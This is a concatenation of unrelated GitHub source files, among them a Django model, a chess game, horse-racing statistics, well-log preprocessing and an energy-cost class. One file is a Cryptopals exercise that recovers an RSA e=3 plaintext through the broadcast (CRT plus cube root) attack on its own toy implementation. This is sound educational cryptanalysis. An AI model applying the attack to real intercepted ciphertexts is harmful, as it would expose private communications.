ThingIndex\n\n\nclass Things(models.Model):\n\n title = models.CharField(max_length=1000)\n description = models.CharField(max_length=4000)\n date_added = models.DateField(auto_now=True)\n user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='things')\n image = models.ImageField(upload_to='things_pic', blank=True)\n\n # Method for indexing the model\n def indexing(self):\n obj = ThingIndex(\n meta={'id': self.id},\n user=self.user.username,\n date_added=self.date_added,\n title=self.title,\n image=self.image.url,\n description=self.description\n )\n obj.save()\n return obj.to_dict(include_meta=True)\n\n # Method for deleting the model\n def deleting(self):\n obj = ThingIndex(\n meta={'id': self.id},\n user=self.user.username,\n date_added=self.date_added,\n title=self.title,\n image=self.image.url,\n description=self.description\n )\n obj.delete()\n return obj.to_dict(include_meta=True)\n\n def __str__(self):\n # Built-in attribute of django.contrib.auth.models.User !\n return self.title\n\n\n'''\n@login_required\ndef AddNewThing(request):\n ThingsFormSet = modelformset_factory(Things, fields=('name', 'price', 'category'), extra=0)\n data = request.POST or None\n formset = ProductFormSet(data=data, queryset=Product.objects.filter(user=request.user))\n for form in formset:\n form.fields['category'].queryset = Category.objects.filter(user=request.user)\n\n if request.method == 'POST' and 
formset.is_valid():\n formset.save()\n return redirect('products_list')\n\n return render(request, 'products/products_formset.html', {'formset': formset})'''","repo_name":"jooya1/jooya","sub_path":"jooya/things/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28578201409","text":"from chess.items.board import *\nfrom chess.items.player import *\nfrom chess.items.peices import *\n\nclass new_game():\n def __init__(self, color):\n self.board = board()\n if color == 'white':\n pass\n self.white = player('white')\n self.black = player('black')\n\n def select_peice(self, color):\n while True:\n #select = input()\n select = 'D4'\n peice = self.white.ownership(select)\n if color == 'w':\n if peice == 'False':\n print(\"You Selected {} which is not your peice, try again: \".format(select))\n else:\n print(\"You selected the {} at {}\".format(peice.title, peice.position))\n return peice\n else:\n if peice == 'False':\n print(\"You Selected {} which is not your peice, try again: \".format(select))\n else:\n print(\"You selected the {} at {}\".format(peice.title, peice.position))\n return peice\n\n def on_board(self, location):\n if location in self.board.positions:\n return True\n else:\n return False\n\n def follows_rule(self, peice, location):\n if peice.position == location:\n return False\n return peice.rule(location, self.board)\n\n def change_location(self, peice, location):\n print(\"The {} at {} will move to {}\".format(peice.title, peice.position, location))\n peice.position = location\n print(\"The {} is now at {}\".format(peice.title, peice.position))\n\n def open_space(self, location):\n if (location in self.white.peices and self.white.turn) \\\n or (location in self.black.peices and self.black.turn):\n return False\n else:\n return True\n\n def r_shift(self, peice, location):\n up_down = False\n up = False\n left = False\n rreal = self.board.positions.get(peice.position).copy()\n lreal = self.board.positions.get(location)\n if rreal[1] == lreal[1]:\n up_down = True\n if rreal[0] > lreal[0]:\n up = True\n elif rreal[1] > lreal[1]:\n left = True\n\n if up:\n while rreal[0] != lreal[0]:\n rreal[0] -= 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for j in self.black.peices:\n if rreal == self.board.positions.get(j.position):\n return False\n return True\n\n elif up_down:\n rreal = self.board.positions.get(peice.position).copy()\n while rreal[0] != lreal[0]:\n rreal[0] += 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n\n elif left:\n rreal = self.board.positions.get(peice.position).copy()\n while rreal[1] != lreal[1]:\n rreal[1] -= 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n\n else:\n rreal = self.board.positions.get(peice.position).copy()\n while rreal[1] != lreal[1]:\n rreal[1] += 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n\n\n def b_shift(self, peice, 
location):\n up_left = False\n up_right = False\n down_left = False\n rreal = self.board.positions.get(peice.position).copy()\n lreal = self.board.positions.get(location)\n if rreal[0] > lreal[0]:\n if rreal[1] > lreal[1]:\n up_left = True\n else:\n up_right = True\n elif rreal[1] > lreal[1]:\n down_left = True\n\n if up_left:\n while rreal != lreal:\n rreal[0] -= 1\n rreal[1] -= 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n elif up_right:\n rreal = self.board.positions.get(peice.position).copy()\n while rreal != lreal:\n rreal[0] -= 1\n rreal[1] += 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n\n elif down_left:\n rreal = self.board.positions.get(peice.position).copy()\n while rreal != lreal:\n rreal[0] += 1\n rreal[1] -= 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n\n else:\n rreal = self.board.positions.get(peice.position).copy()\n while rreal != lreal:\n rreal[0] += 1\n rreal[1] += 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for i in self.black.peices:\n if rreal == self.board.positions.get(i.position) and rreal != lreal:\n return False\n return True\n\n def p_shift(self, peice, location):\n rreal = self.board.positions.get(peice.position).copy()\n lreal = self.board.positions.get(location)\n if abs(rreal[1] - lreal[1]) == 1:\n return True\n else:\n if rreal[0] > lreal[0]:\n while rreal[0] != lreal[0]:\n rreal -= 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for j in self.black.peices:\n if rreal == self.board.positions.get(j.position):\n return False\n return True\n else:\n while rreal[0] != lreal[0]:\n rreal += 1\n for i in self.white.peices:\n if rreal == self.board.positions.get(i.position):\n return False\n for j in self.black.peices:\n if rreal == self.board.positions.get(j.position):\n return False\n return True\n\n def K_shift(self, peice, location):\n if peice.owner == 'white':\n return False if location in self.white.peices else True\n else:\n return False if location in self.black.peices else True\n\n def q_shift(self, peice, location):\n rreal = self.board.positions.get(peice.position).copy()\n lreal = self.board.positions.get(location)\n if rreal[0] == lreal[0] or rreal[1] == lreal[1]:\n return self.r_shift(peice, location)\n else:\n return self.b_shift(peice, location)\n\n def blocked(self, peice, location):\n if peice.title == 'k':\n return True\n block_call = {\n \"R\": self.r_shift(peice, location),\n \"B\": self.b_shift(peice, location),\n \"K\": self.K_shift(peice, location),\n \"Q\": self.q_shift(peice, location),\n \"p\": self.p_shift(peice, location)\n }\n return block_call.get(peice.title)\n\n def move_to(self, peice, color):\n print(\"Enter the location you want to move {} to: \".format(peice.title))\n while True:\n location = input()\n #location = 'A4'\n if self.on_board(location) and self.open_space(location):\n if self.follows_rule(peice, location):\n if self.blocked(peice, location):\n 
self.change_location(peice, location)\n return peice\n else:\n print(\"Your {} is blocked\".format(peice.title))\n else:\n print(\"{} cant make that move\".format(peice.title))\n\n else:\n print(\"{} is not on the board. What the fuck you doing bro\".format(location))\n print(\"Pick again\")\n #check if blocked\n\n def game_flow(self):\n self.board.draw_board(self.white.peices, self.black.peices)\n if self.white.turn:\n print(\"whites turn, enter the peice you want to move: \")\n peice = self.select_peice('w')\n self.move_to(peice, 'w')\n self.board.draw_board(self.white.peices, self.black.peices)\n\n\n\n\n","repo_name":"RiskyClick/chess","sub_path":"logic/new_game.py","file_name":"new_game.py","file_ext":"py","file_size_in_byte":9951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13464353018","text":"from .. import mod\nfrom .. import roots\nfrom .. import rsa\n\n\n# The secret message that we want to recover.\nPRIVATE_MESSAGE = int.from_bytes(b\"Hello this is a secret message.\", \"big\")\n\n\ndef add_padding(m, modulus_bits, padding_len):\n padding_bits = padding_len * 8\n padding = (1 << padding_bits) - 1 # [0xFF] * padding_len\n # Note: we keep first byte as 0x00 to ensure < modulus\n assert modulus_bits > 8 + padding_bits\n padding <<= modulus_bits - 8 - padding_bits\n assert m < padding\n return padding | m\nassert add_padding(0x42, modulus_bits=4*8, padding_len=2) == 0x00FFFF42\n\n\ndef remove_padding(padded_m, padding_len):\n padding_bits = padding_len * 8\n assert padded_m.bit_length() > padding_bits\n m_bits = padded_m.bit_length() - padding_bits\n mask = (1 << m_bits) - 1\n return padded_m & mask\nassert remove_padding(add_padding(0x42, modulus_bits=4*8, padding_len=2),\n padding_len=2) == 0x42\n\n\ndef capture_messages(e, bits=1024, padding_fn=None):\n \"\"\"Returns a list of 'e' (ciphertext, mudolus) pairs.\"\"\"\n m = PRIVATE_MESSAGE\n parties = [rsa.Rsa(e=e, bits=bits) for _ in range(e)]\n m = padding_fn(m) if padding_fn is not None else m\n return [(r.encrypt(m), r.n) for r in parties]\n\n\n# First of all, if p is small, we can directly recover it (it doesn't ever wrap\n# around N):\nprint(\"[*] Recovering m^3 for small m.\")\nprint(\" gen keys & encrypt...\")\nc = rsa.Rsa(e=3, bits=1024).encrypt(PRIVATE_MESSAGE)\nprint(\" cube root...\")\nassert roots.iroot(c, 3) == PRIVATE_MESSAGE\nprint(\" recovered!\")\n\n# If we add some static \"padding\" at the start, causing p^3 to wrap, we can\n# still recover p through CRT.\nprint(\"[*] Recovering m^3 for larger m, that wraps around N.\")\nstatic_pad = lambda m: add_padding(m, modulus_bits=1024, padding_len=3)\nprint(\" capturing 3 ciphertexts...\")\n((c_0, n_0), (c_1, n_1), (c_2, n_2)) = capture_messages(e=3, bits=1024,\n padding_fn=static_pad)\nprint(\" checking that cube root isn't sufficient...\")\nassert remove_padding(roots.iroot(c_0, 3), padding_len=3) != PRIVATE_MESSAGE\nprint(\" crt...\")\nc = mod.crt(residues=[c_0, c_1, c_2], moduli=[n_0, n_1, n_2])\nprint(\" cube root...\")\np = roots.iroot(c, 3)\nassert remove_padding(p, padding_len=3) == PRIVATE_MESSAGE\nprint(\" recovered!\")\n","repo_name":"JesseEmond/matasano-cryptopals","sub_path":"src/set_5/40.py","file_name":"40.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"75"} +{"seq_id":"15026729386","text":"import os\nfrom string import ascii_letters\n\n\ndef get_rucksacks(lines: list[str]) -> list[tuple[str, str]]:\n 
line_gen = (line.strip() for line in lines)\n return [\n (line[: len(line) // 2], line[len(line) // 2 :]) # noqa: E203\n for line in line_gen\n ]\n\n\ndef group_rucksacks(\n rucksacks: list[tuple[str, str]], group_size=3\n) -> list[list[tuple[str, str]]]:\n res = []\n rucksacks = rucksacks.copy()\n while rucksacks:\n group = []\n for _ in range(0, group_size):\n if rucksacks:\n group.append(rucksacks.pop())\n res.append(group)\n return res\n\n\ndef shared_items(rucksack: tuple[str, str]) -> set[str]:\n first_compartment, second_compartment = rucksack\n return set(first_compartment).intersection(second_compartment)\n\n\ndef shared_group_items(rucksack_group: list[tuple[str, str]]):\n shared_items = set(ascii_letters)\n for rucksack in rucksack_group:\n first_compartment, second_compartment = rucksack\n shared_items.intersection_update(first_compartment + second_compartment)\n\n return shared_items\n\n\ndef item_value(item: str):\n return ascii_letters.index(item) + 1\n\n\ndef main():\n with open(os.path.dirname(__file__) + \"/input.txt\", \"r\") as f:\n lines = f.readlines()\n\n rucksacks = get_rucksacks(lines)\n shared_rucksack_items = [shared_items(rucksack) for rucksack in rucksacks]\n\n print(sum(map(lambda x: item_value(x.pop()), shared_rucksack_items)))\n\n grouped_rucksacks = group_rucksacks(rucksacks)\n\n print(\n sum(\n map(\n lambda x: item_value(x.pop()),\n (\n shared_group_items(rucksack_group)\n for rucksack_group in grouped_rucksacks\n ),\n )\n )\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jvllmr/adventofcode","sub_path":"2022/day3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3183485060","text":"import os\nimport lasio\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom PIL import Image\n\ntrain_dir = '/media/Data-B/my_research/Geoscience_FL/data_well_log/las_files_Lithostrat_data/train'\nsave_dir = '/media/Data-B/my_research/Geoscience_FL/data_well_log/1D-image-SegLog_DN1/train'\n\nlog_curves = ['CALI', 'BS', 'DCAL', 'ROP', 'RDEP', 'RSHA', 'RMED', 'SP', 'DTS', 'DTC', 'NPHI', 'GR', 'RHOB', 'DRHO']\n\nlithology_numbers = {30000: 0,\n 65030: 1,\n 65000: 2,\n 80000: 3,\n 74000: 4,\n 70000: 5,\n 70032: 6,\n 88000: 7,\n 86000: 8,\n 99000: 9,\n 90000: 10,\n 93000: 11,\n 12345: 12}\n\n\ndef x_preprocessing(df):\n X = df.fillna(0)\n X = X[log_curves]\n X = X.apply(lambda x: (x - x.min()) / (x.max() - x.min()))\n X = X.fillna(0)\n return X\n\ndef df_to_tensor(X):\n # Get the total number of depth points (D) and number of log curves (N)\n D = len(X.index.values)\n N = len(X.columns)\n data = X.to_numpy()\n input_tensor = np.reshape(data, (D, N, 1))\n return input_tensor\n\ndef label_to_tensor(y):\n DL = len(y.index)\n NL = len(y.columns) - 1 # Exclude the label column\n C = 13 # Number of classes\n label_tensor = np.zeros((DL, NL, 13))\n print(label_tensor.shape)\n for i, row in enumerate(label_tensor):\n for j, val in enumerate(row):\n class_label = labels.iloc[i]\n label_tensor[i, j, class_label] = 1\n return label_tensor\n\nfor filename in tqdm(os.listdir(train_dir)):\n if filename.endswith('.las'):\n file_path = os.path.join(train_dir, filename)\n print(f'{file_path} is being processed...')\n las = lasio.read(f'{file_path}')\n df = las.df()\n\n # Preprocessing the log curve(input) data\n for curve in log_curves:\n if curve not in df.columns:\n df[curve] = 0\n \n X = x_preprocessing(df)\n input_tensor = 
df_to_tensor(X)\n input_tensor = (input_tensor * 255).astype(np.uint8)\n image = Image.fromarray(input_tensor[:, :, 0], mode='L')\n save_path = os.path.join(save_dir, 'x', f'{os.path.splitext(filename)[0]}.png')\n image.save(save_path)\n\n # Preprocessing labels\n labels = df['FORCE_2020_LITHOFACIES_LITHOLOGY'].fillna(12345).astype(int)\n labels = labels.replace(lithology_numbers)\n y = pd.concat([X, labels], axis=1)\n\n label_tensor = label_to_tensor(y)\n scaled_label_tensor = (label_tensor[:, :, 0] * 255).astype(np.uint8)\n\n # Convert to PIL image\n save_path_label = os.path.join(save_dir, 'y', f'{os.path.splitext(filename)[0]}.png')\n label_image = Image.fromarray(scaled_label_tensor, mode='L')\n label_image.save(save_path_label)\n\nprint('Preprocessing finished')\n\n\n","repo_name":"hyonbokan/lithology-identification-fl","sub_path":"data_trasform/1D-image-SegLog/las2img_seg_2.py","file_name":"las2img_seg_2.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36109894820","text":"class 技术路线类:\n def __init__(self, 名称, 数据, 锅炉额定产汽量 = 0, 额定制冷量 = 0):\n self.数据 = 数据\n self.名称 = 名称\n self.锅炉额定产汽量 = 锅炉额定产汽量\n self.额定制冷量 = 额定制冷量\n self.产蒸汽 = False\n self.制冷 = False\n if self.锅炉额定产汽量 > 0:\n self.产蒸汽 = True\n if self.额定制冷量 > 0:\n self.制冷 = True\n\n # 成员变量初始化\n self.投入产出量索引列表 = ['发电量', '产汽量', '制冷量', '自耗电量', '耗气量', '耗水量']\n self.设备实时量 = dict()\n self.设备全年量 = dict()\n for key in self.投入产出量索引列表:\n self.设备实时量[key] = [0] * 8760\n self.设备全年量[key] = 0\n\n self.实时单位产汽运行收益 = 0\n self.实时单位制冷运行收益 = 0\n self.设备实时量['单位产汽运行收益'] = [0] * 8760\n self.设备实时量['单位制冷运行收益'] = [0] * 8760\n\n self.设备价格 = 0\n self.发电机规模 = 0\n self.额定耗气量 = 0\n self.满负荷运行小时数 = 0\n self.发电效率 = 0\n self.余热锅炉装机规模 = 0\n self.溴冷机装机规模 = 0\n\n self.自耗电比例 = 0\n self.耗水率 = 0\n self.满负荷运行小时数限制 = 0\n self.单位制冷耗蒸汽量 = 0\n self.锅炉单位产汽耗电量 = 0\n self.单位制冷耗电量 = 0\n\n def 计算实时单位产汽运行收益(self, i):\n if self.产蒸汽 is True:\n 单位产汽燃气成本 = (self.额定耗气量 / self.锅炉额定产汽量) * self.数据.数据索引['燃气价格']\n 单位产汽自耗电成本 = ((self.发电机规模 / self.锅炉额定产汽量) * self.自耗电比例 + self.锅炉单位产汽耗电量) * self.数据.数据索引['用电价格'][i]\n 单位产汽水成本 = self.数据.数据索引['水价格'] * self.耗水率\n 单位产汽蒸汽收入 = self.数据.数据索引['蒸汽价格']\n 单位产汽供电收入 = (self.发电机规模 / self.锅炉额定产汽量) * self.数据.数据索引['供电价格'][i]\n 单位产汽运行收益 = 单位产汽蒸汽收入 + 单位产汽供电收入 - 单位产汽燃气成本 - 单位产汽自耗电成本 - 单位产汽水成本\n else:\n 单位产汽运行收益 = 0\n return 单位产汽运行收益\n\n def 计算实时单位制冷运行收益(self, i):\n if self.制冷 is True:\n if self.产蒸汽 is True:\n 单位制冷燃气成本 = (self.额定耗气量 * self.单位制冷耗蒸汽量 / self.锅炉额定产汽量) * self.数据.数据索引['燃气价格']\n 单位制冷供电收入 = (self.发电机规模 * self.单位制冷耗蒸汽量 / self.锅炉额定产汽量) * self.数据.数据索引['供电价格'][i]\n 单位制冷自耗电成本 = ((self.发电机规模 * self.单位制冷耗蒸汽量 / self.锅炉额定产汽量) * self.自耗电比例 + self.单位制冷耗电量) * self.数据.数据索引['用电价格'][i]\n else:\n 单位制冷燃气成本 = (self.额定耗气量 / self.额定制冷量) * self.数据.数据索引['燃气价格']\n 单位制冷自耗电成本 = ((self.发电机规模 / self.额定制冷量) * self.自耗电比例 + self.单位制冷耗电量) * self.数据.数据索引['用电价格'][i]\n 单位制冷供电收入 = (self.发电机规模 / self.额定制冷量) * self.数据.数据索引['供电价格'][i]\n\n 单位制冷水成本 = 0\n 单位制冷冷量收入 = self.数据.数据索引['供冷价格']\n 单位制冷运行收益 = 单位制冷冷量收入 + 单位制冷供电收入 - 单位制冷燃气成本 - 单位制冷自耗电成本 - 单位制冷水成本\n else:\n 单位制冷运行收益 = 0\n return 单位制冷运行收益\n\n def 计算实时量(self, i):\n if self.产蒸汽 is True:\n self.设备实时量['发电量'][i] = (self.设备实时量['产汽量'][i] / self.锅炉额定产汽量) * self.发电机规模\n self.设备实时量['自耗电量'][i] = self.设备实时量['发电量'][i] * self.自耗电比例 + self.设备实时量['产汽量'][i] * self.锅炉单位产汽耗电量\n self.设备实时量['耗气量'][i] = (self.设备实时量['产汽量'][i] / self.锅炉额定产汽量) * self.额定耗气量\n self.设备实时量['耗水量'][i] = self.设备实时量['产汽量'][i] * self.耗水率\n if self.产蒸汽 is False and self.制冷 is True:\n 
self.设备实时量['发电量'][i] = (self.设备实时量['制冷量'][i] / self.额定制冷量) * self.发电机规模\n self.设备实时量['自耗电量'][i] = self.设备实时量['发电量'][i] * self.自耗电比例 + self.设备实时量['制冷量'][i] * self.单位制冷耗电量\n self.设备实时量['耗气量'][i] = (self.设备实时量['制冷量'][i] / self.额定制冷量) * self.额定耗气量\n self.设备实时量['耗水量'][i] = 0\n\n","repo_name":"alex-kx/kxrepo","sub_path":"mysite-b4/moduletest/energysolution/Technology_base.py","file_name":"Technology_base.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"26786443669","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom collections import Counter\n\n\ndef get_data(file_path):\n df = pd.read_csv(file_path)\n return df\n\n\ndef numStr(num):\n if num >= 10:\n return str(num)\n else:\n return '0' + str(num)\n\n\nif __name__ == '__main__':\n ninki = []\n payback = []\n ninki_sum = []\n ninki_payback = []\n free_ninki = []\n free_ninki_sum = []\n free_ninki_payback = []\n free_data_num = 0\n grade_list = []\n baba_list = []\n\n data_num = 0\n y = [] # あたり率\n yNum = [] # 出現回数\n # for i in range(start, end):\n # for n in range(1, 13):\n for year in range(2020, 2021):\n for placeCode in range(1, 11):\n for kaisai in range(1, 8):\n for nitime in range(1, 13):\n for raceNum in range(1, 13):\n RACE_ID = str(year) + numStr(placeCode) + \\\n numStr(kaisai) + numStr(nitime) + \\\n numStr(raceNum)\n print(RACE_ID)\n try:\n tmp_data = get_data(\n \"Paybackcsv/\" + RACE_ID + \"_RaceInfo.csv\")\n g = tmp_data[\"レース\"].values[0]\n b = tmp_data[\"馬場\"].values[0]\n p = tmp_data[\"場所\"].values[0]\n # if \"G3\" in g or \"G2\" in g or \"G1\" in g:\n # if b == \"良\":\n path = \"Paybackcsv/\" + RACE_ID + \"_RaceResult.csv\"\n data = get_data(path)\n free_data_num += 1\n s = int(data.query('買い方 == \"三連複\"')\n [\"人気\"].values)\n d = int(data.query('買い方 == \"三連複\"')[\n \"払い戻し\"].values[0].replace(\",\", \"\"))\n z = int(data.query('買い方 == \"単勝\"')[\n \"払い戻し\"].values[0].replace(\",\", \"\"))\n l = int(data.query('買い方 == \"三連複\"')\n [\"人気\"].values)\n free_ninki.append(s)\n if s not in free_ninki_sum:\n free_ninki_sum.append(s)\n free_ninki_payback.append([s, d])\n for k1, n1 in enumerate(free_ninki_sum):\n if n1 == s:\n free_ninki_payback[k1][1] += d\n if (p == \"東京\" or p == \"札幌\" or p == \"阪神\") and b == \"良\":\n data_num += 1\n # s = int(data.query('買い方 == \"三連複\"')\n # [\"人気\"].values)\n # d = int(data.query('買い方 == \"三連複\"')[\n # \"払い戻し\"].values[0].replace(\",\", \"\"))\n ninki.append(s)\n if s not in ninki_sum:\n ninki_sum.append(s)\n ninki_payback.append([s, d])\n for k, n in enumerate(ninki_sum):\n if n == s:\n ninki_payback[k][1] += d\n except:\n import traceback\n traceback.print_exc()\n None\n print(free_data_num)\n print(data_num)\n # print(ninki)\n # print(payback)\n # print(ninki_sum)\n # print(ninki_payback)\n\n # 制限なし\n f_counter = Counter(free_ninki)\n f_count = f_counter.most_common() # N番目人気のあたり回数をカウント\n f_sorted_data = sorted(f_count, key=lambda x: x[0]) # N番目人気のあたり回数を人気純にそーと\n # N番目人気のあたり合計金額を人気順にそーと\n f_sorted_data2 = sorted(free_ninki_payback, key=lambda x: x[0])\n\n f_x = [f_x[0] for f_x in f_sorted_data] # N番目人気を横軸\n f_y1 = [f_y[1] for f_y in f_sorted_data] # N番目人気のあたり回数を縦軸\n f_y2 = [f_y[1] for f_y in f_sorted_data2] # N番目人気のあたり合計金額を縦軸\n f_y3 = np.array(f_y2)/np.array(f_y1) # N番目人気の平均あたり金額\n f_y4 = np.array([f_y[1] for f_y in f_sorted_data]) / \\\n free_data_num # N番目人気のあたり率\n f_y5 = np.array(f_y4)*np.array(f_y3) # N番目人気のあたり率*平均あたり金額\n\n f_y_sum = []\n 
f_y_pay_sum = []\n f_y_pay_out = []\n for i in range(1, 11):\n f_y_sum.append(sum(f_y1[:i*10])) # N*十番人気までのあたり回数\n f_y_pay_sum.append(sum(f_y2[:i*10])) # N*十番人気までのあたり金額\n f_y_pay_out.append(i*10)\n\n f_y6 = np.array(f_y_pay_sum)/np.array(f_y_sum) # N*10番目まで買った時のあたり平均金額\n f_y7 = np.array(f_y_sum)/free_data_num # N*10番目まで買った時のあたり率\n f_y8 = np.array(f_y7)*np.array(f_y6) # y番目人気まで買った時のあたり率*平均あたり金額\n f_y9 = np.array(f_y8)/np.array(f_y_pay_out) # あたり期待値/払う金額\n\n # なんらかのせいげんをつけた値\n\n counter = Counter(ninki)\n count = counter.most_common() # N番目人気のあたり回数をカウント\n sorted_data = sorted(count, key=lambda x: x[0]) # N番目人気のあたり回数を人気純にそーと\n # N番目人気のあたり合計金額を人気順にそーと\n sorted_data2 = sorted(ninki_payback, key=lambda x: x[0])\n\n x = [x[0] for x in sorted_data] # N番目人気を横軸\n y1 = [y[1] for y in sorted_data] # N番目人気のあたり回数を縦軸\n y2 = [y[1] for y in sorted_data2] # N番目人気のあたり合計金額を縦軸\n y3 = np.array(y2)/np.array(y1) # N番目人気の平均あたり金額\n y4 = np.array([y[1] for y in sorted_data])/data_num # N番目人気のあたり率\n y5 = np.array(y4)*np.array(y3) # N番目人気のあたり率*平均あたり金額\n\n y_sum = []\n y_pay_sum = []\n y_pay_out = []\n for i in range(1, 11):\n y_sum.append(sum(y1[:i*10])) # N*十番人気までのあたり回数\n y_pay_sum.append(sum(y2[:i*10])) # N*十番人気までのあたり金額\n y_pay_out.append(i*10)\n\n y6 = np.array(y_pay_sum)/np.array(y_sum) # N*10番目まで買った時のあたり平均金額\n y7 = np.array(y_sum)/data_num # N*10番目まで買った時のあたり率\n y8 = np.array(y7)*np.array(y6) # y番目人気まで買った時のあたり率*平均あたり金額\n y9 = np.array(y8)/np.array(y_pay_out) # あたり期待値/払う金額\n\n # plt.xticks(fontsize=8)\n print(y6)\n plt.bar(x[:10], width=-0.4, height=y8, align='edge')\n plt.bar(x[:10], width=0.4, height=f_y8, align='edge')\n\n # # plt.plot(x, y7)\n plt.show()\n","repo_name":"notitle420/Analyze_Keiba","sub_path":"NetkeibaAnalyzeBakenNinki.py","file_name":"NetkeibaAnalyzeBakenNinki.py","file_ext":"py","file_size_in_byte":7187,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17918527648","text":"file = open('smallsort.in', 'r')\nwrite_file = open('smallsort.out', 'w')\n\narr = list(map(int, file.readlines()[1].split()))\n\nN = len(arr)\n\nfor i in range(1, N):\n for j in range(i, 0, -1):\n if arr[j] < arr[j - 1]:\n arr[j], arr[j-1] = arr[j - 1], arr[j]\n else:\n break\n\narr = list(map(str, arr))\n\nwrite_file.write(' '.join(arr))\n\nfile.close()\nwrite_file.close()","repo_name":"miht-sem/algorithms-and-data-structures-labs","sub_path":"Lab1/smallsort-D-insert-sort.py","file_name":"smallsort-D-insert-sort.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12010851947","text":"from copy import deepcopy\n\nimport torch\nfrom torch import nn\n\n\nclass ModelEma(object):\n \"\"\"Model for Exponential Moving Average.\n\n Parameters\n ----------\n model : nn.Module\n Model for training.\n decay : float, optional\n Rate of previous weight, by default 0.9\n n : int, optional\n Interval steps between weight update, by default 1\n \"\"\"\n\n def __init__(self, model: nn.Module, decay: float = 0.9, n: int = 1):\n # make a copy of the model for accumulating moving average of weights\n self.ema_model = deepcopy(model)\n self.ema_model.eval()\n self.decay = decay\n self.n = n\n self.count = self.n\n\n self.ema_model\n self.ema_has_module = hasattr(self.ema_model, \"module\")\n for p in self.ema_model.parameters():\n p.requires_grad_(False)\n\n def _update(self, model):\n # correct a mismatch in state dict keys\n needs_module = hasattr(model, \"module\") and not 
self.ema_has_module\n with torch.no_grad():\n state_dict = model.state_dict()\n for k, ema_v in self.ema_model.state_dict().items():\n if needs_module:\n k = \"module.\" + k\n model_v = state_dict[k].detach()\n ema_v.copy_(ema_v * self.decay + model_v * (1.0 - self.decay))\n\n def update(self, model):\n self.count -= 1\n if self.count == 0:\n self._update(model)\n self.count = self.n\n","repo_name":"shimacos37/kaggle-days-mumbai-3rd-place","sub_path":"sakami/src/ema.py","file_name":"ema.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"40844262620","text":"import argparse\nfrom . import reviews\nfrom . import config\n\nparser = argparse.ArgumentParser(description=\"\")\n\nsubparsers = parser.add_subparsers(help=\"\")\n\nparser_set = subparsers.add_parser(\n \"set\", help=\"Set the GitHub User ID or access token\")\nparser_set.add_argument(\"--user\", type=str, nargs=1, help=\"GitHub User ID\")\nparser_set.add_argument(\"--token\",\n type=str,\n nargs=1,\n help=\"GitHub Access Token\")\nparser_set.set_defaults(func=config.set)\n\nparser_list = subparsers.add_parser(\"list\",\n help=\"List PRs that need reviewing\")\nparser_list.set_defaults(func=reviews.get_review_requests)\n\n\ndef parse_command():\n args = parser.parse_args()\n args.func(args)\n","repo_name":"Thomas-James-Rose/py-prs","sub_path":"py_prs/py_prs.py","file_name":"py_prs.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19370180766","text":"# free energy plotter\n\ndef read_data(path):\n data = pd.read_csv(path, skiprows=4, header=None,\n delim_whitespace=True).rename(\n columns={\n 0:'bin',\n 1:'xi',\n 2:'count',\n 3:'p'})\n\nclass FreeEnergy():\n \n def __init__(self, ID):\n self.ID = ID\n self.path = 'results/{}/xi.hist'.format(ID)\n\n def change_path(self, new_path):\n self.path = new_path\n\n def probability(self):\n data = read_data(self.path)\n return data\n\n def calculate_energy(self, kBT=1.2):\n data = self.read_data(self)\n p = data['p']\n F = -kBT * np.array([math.log10(num) for num in p])\n data['F']=F\n return data\n\n def plot_energy(self, wind):\n data = self.calculate_energy(self)\n roller = data.rolling(wind, center=True)\n fig, ax = plt.subplots(1)\n ax.plot(data['xi'], r.mean()['F'], c='red')\n ax.bar(data['xi'], data['F'], alpha=0.4, width=0.01)\n ax.fill_between(data['xi'], r.mean()['F']+r.std()['F'],\n r.mean()['F']-r.std()['F'], alpha=0.4, color='red')\n plt.xlabel(r'$\\xi$ [$\\sigma$]')\n 